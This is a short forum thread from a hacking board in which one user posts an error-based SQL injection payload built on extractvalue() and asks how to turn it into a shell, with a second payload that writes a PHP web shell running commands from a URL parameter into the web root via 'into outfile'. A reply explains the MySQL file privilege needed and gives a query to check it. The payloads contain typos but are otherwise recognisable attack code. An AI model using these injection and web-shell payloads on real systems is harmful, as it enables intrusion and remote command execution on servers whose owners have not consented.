Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
how to getshell
Posted by: guantouqiang
Date: May 08, 2014 10:47AM

for this:
this can get data,but how to getshell
id=99 and extractvalue(1, concat(0x5c, (select datanase())))--

can't this
id=99 and extractvalue(1, concat(0x5c, (select '<?php system($_GET[1]);?>' into oufile '/var/www/god.php')))--

extractvalue() how to exploit "select into outfile" getshell

Options: ReplyQuote
Re: how to getshell
Posted by: MgArKr
Date: May 13, 2014 06:09AM

To exploit outfile you must have the file_priv : Y.

Check the file_priv. user(),0x3a,file_priv from mysql.user

If I am wrong, sorry for the mistake and my bad english :P

Options: ReplyQuote


Sorry, only registered users may post in this forum.